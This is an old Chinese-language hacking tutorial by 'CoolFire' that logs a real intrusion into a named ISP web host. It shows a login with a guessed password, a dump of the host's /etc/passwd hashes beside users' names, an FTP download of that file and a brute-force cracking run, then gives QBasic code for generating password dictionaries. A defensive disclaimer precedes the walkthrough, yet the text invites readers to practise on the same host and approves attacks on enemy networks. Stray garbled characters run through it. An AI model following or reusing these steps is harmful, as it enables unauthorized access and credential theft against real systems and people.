如何破解系統(tǒng)（3）

這不是一個教學文件, 只是告訴你該如何破解系統(tǒng),好讓你能夠?qū)⒆约旱南到y(tǒng)作安全的保護, 如果你能夠?qū)⑦@份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫這篇文章的目的是要讓大家明白電腦安全的重要性, 并不是教人 Crack Password若有人因此文件導(dǎo)致惡意入侵別人的電腦或網(wǎng)路, 本人概不負責 !!
9 d1 X  G; Y+ P: {( U: u% |0 B
4 x$ J0 w) u9 I( K前幾次說到了 Net Coffee 店, 還好他們沒有提供客戶撥接上線的功能,不然密碼或是帳號被人盜用的客戶不就糗大了! 但是 CoolFire 在這兩周的探險中, 為了找一個酷似網(wǎng)路咖啡站臺的
W3 密碼,誤入一個號稱第一個提供網(wǎng)路撥接的 ISP, 且在 CoolFire 順利的抓回 /etc/passwd
之後, 使用了自己寫的 PaSs2DiC + CJack 來解出密碼, 沒想到不用 1 分鐘, 就找出了 9 組 ID 與Password 相同的密碼,勿怪我沒有在這里提醒大家, 還好我沒有找到 root password, 不然可能該系統(tǒng)就此停擺,不可再見天日也! (當然我不可能這麼作啦!).

看看最近興起的網(wǎng)路咖啡及各大網(wǎng)站的系統(tǒng)安全設(shè)施, 再加上 CoolFire最近開會的時候遇到的情況, 不難發(fā)現(xiàn)我們的國家正往高科技的領(lǐng)域快步邁進, 但是這些系統(tǒng)的安全性若不加強,可能到時候人家只要一臺電腦再加上一臺數(shù)據(jù)機就可以讓整個國家的金融及工商業(yè)崩潰!
大家要小心呀 !
ISP 是一般 User 撥接的源頭, 技術(shù)上理應(yīng)比較強, 但還是輕易讓人入侵, 且又沒有教導(dǎo)User 正確的網(wǎng)路使用觀念 (Password 的設(shè)定及 proxy 的使用等),實在不敢想像這樣的網(wǎng)路發(fā)展到幾年後會是甚麼樣子 ??
' V; \  S% ~' g; n
這一次的說明還是沒有談到新的技巧, 在 James將首頁更新後各位應(yīng)該已經(jīng)可以從中學到許多東西了, 如果想要學習入侵, 就一定要知道最新的資訊 (入侵本國的網(wǎng)路則不用,反正沒人重視網(wǎng)路安全..... 真失望), 在別人還沒將 Bug 修正之前就搶先一步拿到 /etc/passwd,所以訂閱一些網(wǎng)路安全的 Mail List 是必要的, 多看一些網(wǎng)安有關(guān)的 News Group 也是必要的 (不僅 Hacker如此, ISP 更要多注意這些資訊!). 日後有空再整里一些 Mail List 給大家 !!
+ ~8 u1 @  N; T* |* ]8 g
4 B/ R# @$ D6 u6 ]" L' F& l' o本次主題: 說明如何連接該 ISP 并且對其 /etc/passwd 解碼連接位址: www.coffee.com.tw (203.66.169.11)特別說明: 由於本次主題說明重點使用真實的位址及名稱, 所以 CoolFire 已經(jīng) Mail給該網(wǎng)頁之維護人員更改密碼, 但該網(wǎng)頁之 ISP 仍為新手之練習好題材! CoolFire
Mail 給該網(wǎng)頁維護人員之信件內(nèi)容如下, 如果他還不盡快改掉, 我也沒辦法了!
3 A9 ^( G5 e6 J# \
7 A* R9 O" z- f+ ~8 cMail sent to dhacme@tp.globalnet.com.tw:
Subject: 請速更動網(wǎng)頁密碼
/ x+ t) }  ]1 S( R/ M8 YFrom: CoolFire <coolfires@hotmail.com>
( m* k- t  H$ y" ?. W& p
你的網(wǎng)頁作得不錯, 但是因為你所設(shè)定的密碼太容易為駭客所? 入侵, 請於見到此信後速速更改你的網(wǎng)頁進入密碼, 否則下次若網(wǎng)頁遭到篡改, 本人概不負責!!
3 A3 H' J# f2 H) L# O2 W
**** 課程開始 ****
) F" s, i: U2 `$ i7 X
請注意: 由於本次所作的課程內(nèi)容以實作為主, 除了本人 IP 有所更改,一切都使用本人所用之
Telnet 軟體 Log 檔收錄, 故若道德感不佳者請勿閱讀以下之詳細破解內(nèi)容,否則本人概不負責!
! M: Y. u& k  z' k7 N
" i, Q4 I5 `+ j0 G5 C, k3 u(連線到某一主機之後.... 此處的 ms.hinet.net.tw 是假的 Domain name)
ms.hinet.net.tw> telnet www.coffee.com.tw
Trying 203.66.169.11...
' I7 x7 J! J$ n5 s- J; dConnected to www.coffee.com.tw.
8 q2 I) |4 n, `$ n% J2 b5 U6 r5 VEscape character is '^]'.
$ y' y  C( o3 H7 ?* ePassword: (隨便按一下 Enter)
5 H& G3 b2 a9 r  ^, ^8 v3 LLogin incorrect

" t' k1 l( o( Hwww login: coffee (以 Hacker 的敏銳判斷 username=coffee password=coffee)
Password:
Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw
0 U. \1 ~% b, q* d7 F
' j* s! p( s& Y3 E( \3 ^0 P歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽, 大家自己去看吧!
=================================================================

(直接進入核心部份)
! t. j5 i! _- f, [& Lwww:~$ cd /etc
+ \+ Z6 `! m& f2 fwww:/etc$ ls
. {7 N1 l* M/ e0 a, p8 e6 DDIR_COLORS hosts.equiv printcap
HOSTNAME hosts.lpd profile
NETWORKING inet@ protocols
NNTP_INEWS_DOMAIN inetd.conf psdevtab
% `  J& R. A: JX11@ inittab rc.d/
/ @7 Z% w1 I+ Y7 Vat.deny inittab.gettyps.sample resolv.conf
bootptab ioctl.save rpc
% ~+ v) c' V! f* a' P3 vcsh.cshrc issue securetty
csh.login issue.net securetty.old
$ b% A4 F  `2 Y8 c1 }default/ klogd.pid sendmail.cf
diphosts ld.so.cache sendmail.st
exports ld.so.conf services
! m# ]* G# ]+ A+ ?( @& d8 C* p; K# ~1 Yfastboot lilo/ shells
fdprm lilo.conf shutdownpid
5 r# ?" Y: d+ \' G/ o6 S( zfs/ localtime skel/
0 S* P9 W( `$ k% ?" lfstab magic slip.hosts
4 e' A6 p4 B) a. h) k% u. e# qftp.banner mail.rc slip.login
ftp.deny motd snooptab
ftpaccess motd.bak sudoers
0 u2 B# n3 ?, B+ f  K. k( z- tftpconversions msgs/ syslog.conf
+ Z1 H' @2 Q8 I6 Y# R# u  `ftpgroups mtab syslog.pid
ftpusers mtools termcap
gateways named.boot ttys
gettydefs networks utmp@
' Z) d; M( D/ d: [  Dgroup nntpserver vga/
host.conf passwd wtmp@
hosts passwd.OLD yp.conf.example
' ~0 a3 E' y* y( Z% k, `9 R( ^6 w, v& ahosts.allow passwd.old
hosts.deny ppp/
; t9 ^6 y1 w0 Q. y9 Q0 e4 q" t
3 s6 O9 ]% U2 @* Z7 Z(看看我們的目標長得如何???)
www:/etc$ cat passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
: F; g, ?6 k5 G% I9 ?' Nbin:*:1:1:bin:/bin:
. ^9 B1 z9 h& U+ H# X: |daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
* t- R% l  v! Ysync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
" V$ |- t, P& F& N) L' Bhalt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
  K( m: p8 k$ A  o  X  wuucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
1 V$ {: z4 r: [man:*:13:15:man:/usr/man:
; @/ X( u9 m8 m5 X- opostmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
$ a! I- N; j: `4 q' ^www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash
kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
& `; C) P/ z: H' L0 [1 O4 v9 |coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
4 C2 F* q0 j  v$ g" acarven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
! s( @" J) I$ Shaurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash
corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash
: z7 j% @$ _! krichard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash
3 p# X  Z. l0 g( C" ?& a; flilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash
' t, I8 A) |# l/ G' |support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash
hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
. q2 ?, O9 _( Z+ D$ S( u4 Kstonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh
/ ?% M& u4 N3 u# f* T2 ibear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash
lance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash
liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash
) Q6 j5 t/ c7 P# W; csales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash
. |3 }: c0 M+ f0 {recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
9 k, b- `  U& p' yrecycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash
* m4 A5 d4 X) I! k8 w7 O9 Nhxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
) Q' b- U9 {3 `) T- n5 b- qgoodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash
/ X& |6 U) U1 y! {: \sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
! w$ p: h9 ~; |# w; F8 }charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
3 g' I  y4 H+ |( U; Y7 ~jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
2 r) q% X. r  ^, K/ Ctkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
' @3 j* O& k/ v- b. q7 a$ ?2 B+ `s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
( ^/ x3 T/ j3 W0 [. x; b+ slilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash
nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
! ^# K3 s4 S2 _+ g* {toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
' N/ @2 ^6 P- @, P" M+ i2 uyahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash
basic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash
wunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash
kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash
2 b- n- q) n$ p( {shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash
, `  j/ z/ {% u6 o! z& z! H/ }fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash
) L' o( f/ L! }8 Z
- u) t4 B: K  ]" ^% U# a+ g(CoolFire 注: 因為使用 PaSs2DiC 很容易找出 ID 與 Password 相同的. 故除了 Coffee外, 其它我找到密碼的 EnCode Password 部份皆改過..... 除非你一個一個試啦~~~ 我沒說喔!)

& e( V& |: P. R. Y" Ewww:/etc$ exit
logout
Connection closed by foreign host.

! {: p8 \  C, @0 l) L2 Y. |* ^(可以走了 !! 改用 FTP 將 /etc/passwd 給抓回來吧!)

  B9 Y8 |1 X0 Ems.hinet.net.tw> ftp www.coffee.com.tw
Connected to www.coffee.com.tw.
220-
  _- u' s/ y& Q+ V220- 歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽, 大家自己去看吧!
220-
3 E9 i( p5 `3 |9 |- C- D$ C% [; s6 m220-
220- There are 0 users in FTP Server now.
220- 目前已有 0 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- service@xx.xxxxxxx.xxx.xx.
220-
220-
5 J9 o' `. t# G, ^220-
5 j7 X7 Y! e1 b& A220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
$ F' U4 F$ q- e- u% W% l+ @
7 D3 y9 I* u( v! N! `# D6 \(還是使用剛剛的帳號進入)

Name (www.coffee.com.tw:YourName): coffee
  z( l0 n9 x$ c331 Password required for coffee.
/ J' y' i* S+ A* kPassword:
3 Q5 V5 O  d& {. {" b$ c6 q+ I3 p230 User coffee logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
% i' ^3 W! u/ k& q2 S
4 c' b6 t, ~7 V(直接到達檔案放置地點)
% U" J+ @' t, H" `/ [4 w
0 Q2 W9 \6 A3 Jftp> cd /etc
  B# C: U4 g8 `& J0 s8 ?250 CWD command successful.
ftp> ls
/ h* p7 y& |% a2 `) X1 m3 O200 PORT command successful.
2 a0 I" a/ `' b, {* d& e# ?150 Opening ASCII mode data connection for file list.
, Q  `  B9 [" u# Bttys
fdprm
1 m. J  z; t4 n. o/ m! Wgroup
issue
motd
mtools
: B# |' @" p3 x( Rprofile
% S+ a6 ?& W" s, ]* Z) dsecuretty
$ k" ~2 f. s6 U9 a3 eshells
% R0 u4 t- f2 G2 b  T6 _termcap
, q) r1 l+ q$ n8 \1 V! f8 e8 Q# X& Vskel
csh.cshrc
! s* L: w0 k+ I  M) Tcsh.login
lilo
inet
default
0 B9 k6 e% s' F6 p/ Tservices
+ x6 p, V% W+ d, D. K6 u$ t  \1 gHOSTNAME
; u3 a- O% S- a5 P' D& S/ iDIR_COLORS
% B9 a2 v( N' U) f4 K8 Bpasswd
passwd.OLD
# w* o7 O& J/ [1 ywtmp
utmp
1 N1 R. u! y8 Sgettydefs
6 o  C# `4 x" ^3 H2 J0 ~0 k$ Z, Ginittab.gettyps.sample
ld.so.conf
" B( i# z) Q. y  P% t& ?ld.so.cache
/ j% T9 c) W  C- ]$ W, c! ?at.deny
# c6 C* m6 \0 v8 S. sfs
magic
; d9 K% B. D  I* W* Q# y' Urc.d
syslog.conf
; G0 b. L5 j! z- c1 ^/ I: Jprintcap
inittab
sudoers
vga
; J# N  Z& [: v; bdiphosts
8 P% P3 s/ Q' d5 Umail.rc
' f( H1 ]4 m0 _8 `ppp
NNTP_INEWS_DOMAIN
% Q4 Y4 I' o& E0 B/ ?2 t& Wsendmail.st
* t5 }4 M% o* v: v% m7 O# F2 FNETWORKING
gateways
bootptab
- {. w) q" B( z1 Q9 Zexports
, M- S4 ~  n: u1 h( rftpusers
+ o: I8 c  V+ T, a" `  jhost.conf
) h# r/ {) U: r# O8 i7 O8 Mhosts
9 G( H$ w0 z& ^& s' C  y& Z! M3 Ihosts.allow
hosts.deny
hosts.equiv
inetd.conf
named.boot
7 C5 {" |- j0 M' {networks
0 u& T  V% V5 \/ U3 q+ S1 I3 i3 S& W: v- ^nntpserver
protocols
resolv.conf
( D) t5 ?; Y7 T, Brpc
ftpaccess
hosts.lpd
ftpconversions
( b/ \9 j0 {+ Z9 t5 v! Jsnooptab
) e1 T. V  n/ L( Y1 {msgs
( k8 d; M4 c6 M0 }! W" x6 s/ J- Wftpgroups
slip.login
slip.hosts
yp.conf.example
X11
lilo.conf
& ?% Z2 [3 V0 ~$ o. S5 P* I5 C4 \sendmail.cf
. I; L7 D9 O. }" U5 q: `fstab
8 S$ E2 {8 `  o7 Sfastboot
mtab
syslog.pid
# h2 g/ I6 C) V& F$ o9 vklogd.pid
. \6 F7 c+ E# K& b% zshutdownpid
# f7 k) g7 S, w7 mlocaltime
, A8 z  M4 S1 mpasswd.old
ioctl.save
psdevtab
ftp.banner
ftp.deny
( b+ @1 [. h) O0 f3 o2 f9 nissue.net
motd.bak
7 l. i! U$ g" X! p- Nsecuretty.old
$ E/ x  s. w, v: r226 Transfer complete.

(取回該檔案)
" I' U  Z6 Z5 o: S; m. I
ftp> get passwd
$ q* |7 g/ E5 I0 \! U200 PORT command successful.
3 y5 I* |1 t# t5 a150 Opening BINARY mode data connection for passwd (4081 bytes).
226 Transfer complete.
4081 bytes received in 2.5 seconds (1.6 Kbytes/s)
7 W# e- {  A! D) T6 N# s( N! |
(盡速離開)
: @3 t8 M5 o4 {$ J7 {$ \3 |* t
5 I/ o/ ]$ t- X  `8 Y6 ^ftp> bye
221 Goodbye.
' a3 Q5 z" R: m9 t
9 f( P) p' @: |8 w+ q- S好了! 有了 /etc/passwd 之後一切都好辦了, 趕緊將你的寶貝收藏 PaSs2DiC 拿出來吧
$ H  }7 A# }7 }!!快點跑一下, 讓它自動產(chǎn)生字典檔案:

3 O+ e/ f7 ~- T( `3 m" F8 XC:\hack>pass2dic
/ N" I; Z5 h- H7 OPaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.
) G3 C6 N; q4 b
This tool will:

[1] Load PASSWD file and convert it to only username text file
+ j1 I* X/ ?* `, z/ u" H" v[2] Write the file to a dictionary file you choise for target

- Q9 a9 o7 N/ h. k/ B% I5 nYour Source PASSWD File Name: passwd
Your Target Dictionary Name: dic.cfe
& a: N+ w3 w# f1 W, r
4 Z3 \# P& H6 }  V8 }/ T, `PaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw
FETAG Software Development Co: http://www.showtower.com.tw/~fetag
5 z6 z/ c4 Y4 h3 P- M) f
C:\hack>
& b* D1 l. D6 p7 _, c+ D( n
(這樣就好了 ! 自動產(chǎn)生的檔案會放在 dic.cfe 這個檔案中, 咱們跑一下 Brute Force看看!)
, f/ E0 e- {( C: {2 K9 S8 l: l4 u
, {# u9 M. b- j! ~
9 [& ]4 d4 }9 j8 L1 Z. g$ }& C# @C:\hack>fbrute passwd @dic.cfe
$ f$ _& K3 `) L+ A7 p; D2 I/ |+ n1 E
7 I+ E* M+ F+ w, u; I5 iBRUTE!, Unix Brute Force Hacking Routine. v2.0
" }' t7 M( h0 t2 M* i& jCopyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.
闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡

　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　
Attempts/Hits: 5184/9
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　

5 W* x. g& R( ]" u$ j. DTaking list input from dic.cfe
$ p, Y( _  W/ OBeginning search of passwd for password: xxx
0 D3 @$ A5 Y* ~$ o' V: T
9 A* {* U; j4 c; kMatch for password xxxxxx found! Username: xxxxxx
. \% q6 o2 \1 @& `$ f9 W  u0 S2 pMatch for password xxxxx found! Username: xxxxx
' y2 n3 P* |. ]8 mMatch for password xxx found! Username: xxx
Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxxx found! Username: xxxxxx
Match for password coffee found! Username: coffee
Match for password xxxxxxx found! Username: xxxxxxx
Match for password xxx found! Username: xxx
Match for password xxxx found! Username: xxxx

Done.
: u8 |3 {5 L* v' {8 h: |8 m
5 q* a. {6 l0 `* E, ~C:\hack>

$ ~/ _7 u- L7 a  g看! 除了 coffee 外還是有許多人使用與 ID 相同的字作為密碼, 實在是....@#$%^...&*因某些關(guān)系所以其它部份要被 "馬賽克" 起來, 請各位讀者見量!

" O7 U% \) ?: [' M( @8 \1 X**** 再談密碼 ****
* n" M) V  g; n5 b
看了以上的破解示范, 就可以了解到許多人還是對於 "密碼" 這東西不是很有 "密碼"的觀念, 人就是那麼的懶, 隨便設(shè)定一個好記的, 但是這種密碼確是最不安全的, 上次我們談到如何用
QBasic 來設(shè)計一個自動產(chǎn)生密碼的小程式, 相信對許多人有很大的幫助,底下我們再來淺顯的介紹一下字母密碼的產(chǎn)生方法, 相信對於你在 Hack 某站會有更大的幫助.

事情的開始是有一位網(wǎng)友 mail 給我, 問我字典檔要如何寫程式來 "自動擴大",而讓我有了寫這一段的想法, 現(xiàn)在我就針對這位網(wǎng)友的問題作一個更詳細的說明 (因已簡短回信答覆),并且寫出來讓大家了解一下, 當然我們的示范還是使用 QBasic, 因為這是最容易找到的程式了,而且語法大家也可能會比較熟悉一點, 如果我使用 VB 或 C 來寫, 可能有些人只會拿去用,而不會去修改或者寫個好一點的出來!
2 v# Q# k: [! Y6 U2 J2 N& x
* E5 n0 f" m1 I! v( B0 K/ _% X先說明一下原理好了: 我們所要作的程式是一個自動產(chǎn)生字典檔的程式,所以我們要了解字的字母排列到底有哪些方法可循?? 我們先舉幾個簡單的單字出來比較看看:
; }+ L1 @2 Q. u) O* [
[1] apple [2] guest [3] james [4] superman [5] password
9 k8 L* ^) q- s9 |
  g3 {) k, y) AOK! 來看看! 如果你有一點英文的概念的話應(yīng)該會知道母音及子音吧 !
/ ?' S7 m  c" y& H我們首先這樣說明: 母音在英文
' U" @0 V* ?. Y' E上有 : A E I O U 這五個, 所有的英文單字都會有這些母音(有些沒有的可能是專有名詞或縮寫), 也有可能是雙母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui, ua... 等,
' b; R, D3 q% a7 h' `' L/ `9 ?再來就是比較每個字的開頭, 有可能是母音,也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student是兩個子音再接一個母音字母, 所以接下來依照常用字將這些子音找出來, 我想了一下大概有: br, bl, cl, dg,dr, fl, gr, kn, ph, st, sp, wh .... 等幾種(其它請自行統(tǒng)計), 然後是結(jié)尾部份, 通常結(jié)尾部分有下列幾種: e;est; ord; ard; ls; es; s...等好多好多, 我們稍為思考一下就知道要如何寫出這樣的程式出來了 !!
我大略寫一個簡單的, 其它大家自行發(fā)揮, 如果有人學語言學的, 請幫忙弄一份常用組合表出來, 可能會更有幫助吧 !!
& ?1 u. N/ M4 l. w3 f/ t# g
' L" L7 Y2 N7 x3 j- Y底下就是該程式片段, 執(zhí)行後會產(chǎn)生 MyDic.Txt 檔, 大小為: 22,096 Bytes 共有 3120個字的字典!!

--------------- MakeDic.BAS Start Here
; A- P0 q* @( t3 O4 ?9 J- _-------------------------------------------------------------------------------
--------
$ o+ p0 E  s; T% Y5 \5 \& UDIM FirstWord$(20)
/ I2 n2 N+ _5 B! J  w, t4 ~DIM MotherWord$(13)
1 g6 a$ c3 f& U& t% A  ODIM LastWord$(12)
  i* s6 D8 p/ w/ I7 f" k
4 V' f& i& B/ WDATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s",
  u+ `. z3 K" j9 D/ d% M# j8 b"t", "p", "k" , "f", "m", "n", "b","k"
- F$ }" t' ]/ O2 ^' T# XDATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"
DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"

FOR I = 1 TO 20
READ FirstWord$(I)
PRINT FirstWord$(I)
NEXT I

0 T. e- o3 f$ ?4 P# `% A, }+ dFOR I = 1 TO 13
% r4 S" j/ z5 ?, ?9 pREAD MotherWord$(I)
NEXT I

% U) U) ~+ s2 I2 TFOR I = 1 TO 12
READ LastWord$(I)
NEXT I
" z5 Y  u8 \6 d+ D5 a6 j$ S3 I4 m4 o
OPEN "MyDic.txt" FOR OUTPUT AS #1

FOR I = 1 TO 20
FOR J = 1 TO 13
4 M2 \* B  m; l4 g. h, dFOR K = 1 TO 12
6 `! s$ r  y6 MPRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)
- A' F7 ~* O! @# h) gNEXT K
8 [$ y. _* W% S" T9 c1 L' c1 R5 iNEXT J
# F! V: a1 X1 e1 [2 i& T- O5 SNEXT I

% T) q8 E& N) ICLOSE : END
' ?# s  p4 v) |0 F- W--------------- Cut Here, End of MakeDic.BAS
) X( R1 Z% {' p1 o6 C-------------------------------------------------------------------------------
; i$ m8 S( h! d( T( }-
+ N+ u4 b, C  G" B  H; U
2 ^( v' w6 t7 [$ z9 S  }( p當然這只是小部份的組合, 相信你可以作出一個更大的字典檔出來, 如:
子音+母音+子音+母音+子音, 作出來的字典檔會很嚇人喔 !! 這一個部份就講到這里了 ! 如果你有很棒的字典產(chǎn)生程式,寫好了請 Mail 一份給我喔 !! 如果可以的話請說明是否可以公布在我的 W3 上讓其它人下載 !!還是你只是要給我 ?!
- e& |: b+ f6 F& Y. w* f/ W
希望每次講到密碼的問題後, 大家可以將這些密碼的產(chǎn)生方法與自己的密碼對照看看,如果有相同的請趕緊將自己的密碼換掉, 我講得口沫橫飛, 都沒有人要聽嗎 ??? 咖啡業(yè)者...... ISP
們.... 教教你們的使用者吧..... 唉~~~~
# g" l& ?9 E* x+ I  z

**** 後語 ****

我們的首頁感謝大家的支持, 現(xiàn)在人數(shù)已經(jīng)到達 2,000 了, 這是一個地下站(未對外正式公布) 很棒的一個數(shù)字, 在與其它工作室人員研究之後, 暫時不對外公布站址, 如果你是 "誤闖"到本站來的! 我們歡迎你的加入, 但目前尚不考慮對外公布站址, 請您在告訴你的朋友有這麼一個站存在的時候,請他不要隨便告訴別人 (請只告訴你信賴的朋友; 或?qū)﹄娔X有一份特別狂熱的人, 我們都歡迎他們的加入),我們目前所采用的方式將是開放式的! 對首頁部份暫時不以密碼方式處理.
  {  o/ e: F2 n5 z, p6 x0 ]& U) D9 I
1 F0 e) U5 v1 Q** 不要 Crack 這個首頁的 ISP!!!! 否則 FETAG Sofeware's Hacking Page將會完全關(guān)閉, 再也不尋找其它的地方來放置, 希望給你的是使用電腦的 "知識", 不要利用它來奪取任何的 "權(quán)利",本首頁著重的是教育, 而不是一　的教導(dǎo)攻擊的方法, 希望大家對於政府機關(guān) (org.tw) 或教育機構(gòu) (edu.tw)不要作任何的破壞!!還有我的 ISP......:D
7 X/ s! r# @8 o' L
------
  F6 ]% J/ w+ h+ q哇! 一份案子搞了好久, 都沒時間維護網(wǎng)頁了, 所以特別將維護的工作還給了 James,希望大家多多支持我們的園地, 我案子搞完後再跟大家談?wù)勎易罱膶崙?zhàn)故事! 雖然沒時間寫網(wǎng)頁,但是還是會寫一些文件給大家作為參考 !!
: _5 P) Q/ V( ]5 Y  C$ R5 Z
------
" _; }) V. t) h% [再次重申, Crack 別人站臺之後不要破壞別人站臺中的資料, 此篇文章僅作為教育目的,不主張你隨便入侵他人主機.... (高-Net 還是除外)... 請勿將這類技術(shù)使用於破壞上 (又...如果第三次世界大戰(zhàn)開打, 你可以任意破壞敵國的電腦網(wǎng)路... 我全力支持),最嚴重的情況(如果你真的很討厭該主機的話)... 就將它 Shut Down.... 好了! 別太暴力了!
4 j3 m  g1 e4 Z  u